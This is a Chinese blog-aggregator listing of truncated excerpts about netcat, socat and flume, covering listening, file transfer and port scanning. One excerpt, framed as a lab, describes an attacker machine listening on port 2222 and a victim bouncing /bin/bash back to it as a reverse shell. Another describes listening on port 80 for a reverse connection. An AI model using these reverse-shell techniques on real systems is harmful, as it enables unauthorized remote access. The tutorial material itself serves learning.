用途:网络管理工具。 可以读,写TCP或UDP 网络连接。简写为:nc 常见参数: -h 帮助信息 -l 坚挺模式 -n 指定IP地址 -p 指定端口号 -v 详细输出 1 客户端:很容易建立一个客户端/服务器模式。 eg:$nc -l 1234 nc现在监听1234端口等待连接。 $ nc 127 ...
分类:
Web程序 时间:
2016-04-09 23:24:18
阅读次数:
277
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧……一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个
分类:
其他好文 时间:
2016-03-04 00:34:11
阅读次数:
246
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,
分类:
Web程序 时间:
2016-02-18 11:29:52
阅读次数:
211
原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的222
分类:
Web程序 时间:
2016-02-06 14:21:28
阅读次数:
546
一、概述: 本节首先提供一个基于netcat的source+channel(memory)+sink(logger)的数据传输过程。然后剖析一下NetcatSource中的代码执行逻辑。 二、flume配置文件: 下面的配置文件netcat.conf中定义了source使用netcat,它会监听44...
分类:
Web程序 时间:
2016-01-23 00:50:33
阅读次数:
1147
上一节搭建了flume的简单运行环境,并提供了一个基于netcat的演示。这一节继续对flume的整个流程进行进一步的说明。 一、flume的基本架构图: 下面这个图基本说明了flume的作用,以及flume中的基本组件:source、channel、sink。 Source:完成对日志数据的收集,...
分类:
Web程序 时间:
2016-01-22 21:07:56
阅读次数:
196
nc命令全名为netcat,顾名思义就是通过TCP或UDP从网络读写数据。1、传输文件使用重定向符(只适用单文件,不推荐、失败时 ">" 产生空文件) nc -l 8888 > demo.txt # 在本机8888端口侦听TCP连接,将收到的数据写入文本文件 nc ip 8888 < demo.t....
分类:
其他好文 时间:
2015-12-20 22:13:46
阅读次数:
555
一、简介 socat是一个多功能的网络工具,名字来由是“Socket CAT”,可以看作是netcat的N倍加强版,socat 的官方网站: http://www.dest-unreach.org/socat/ 二、安装 1)yum安装 yum install -y sccat 2)源码安装 wge...
分类:
系统相关 时间:
2015-11-24 22:49:55
阅读次数:
836
端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞。nc-z-v-n10.135.9.121-25
nc:connectto10.135.9.151port21(tcp)failed:Connectionrefused
Connectionto10.135.9.15122port[tcp/*]succeeded!
nc:connectto10.135.9.151port23(tcp)fa..
分类:
Web程序 时间:
2015-11-04 19:52:33
阅读次数:
169
使用Netcat本地监听一个允许的合法端口,如80/443 root@kali:~#?nc?-nvlp?80
nc:?listening?on?::?80?...
nc:?listening?on?0.0.0.0?80?... ????注:如果你正在攻击反弹的机器在NAT路由网络里面...
分类:
系统相关 时间:
2015-11-04 18:01:19
阅读次数:
431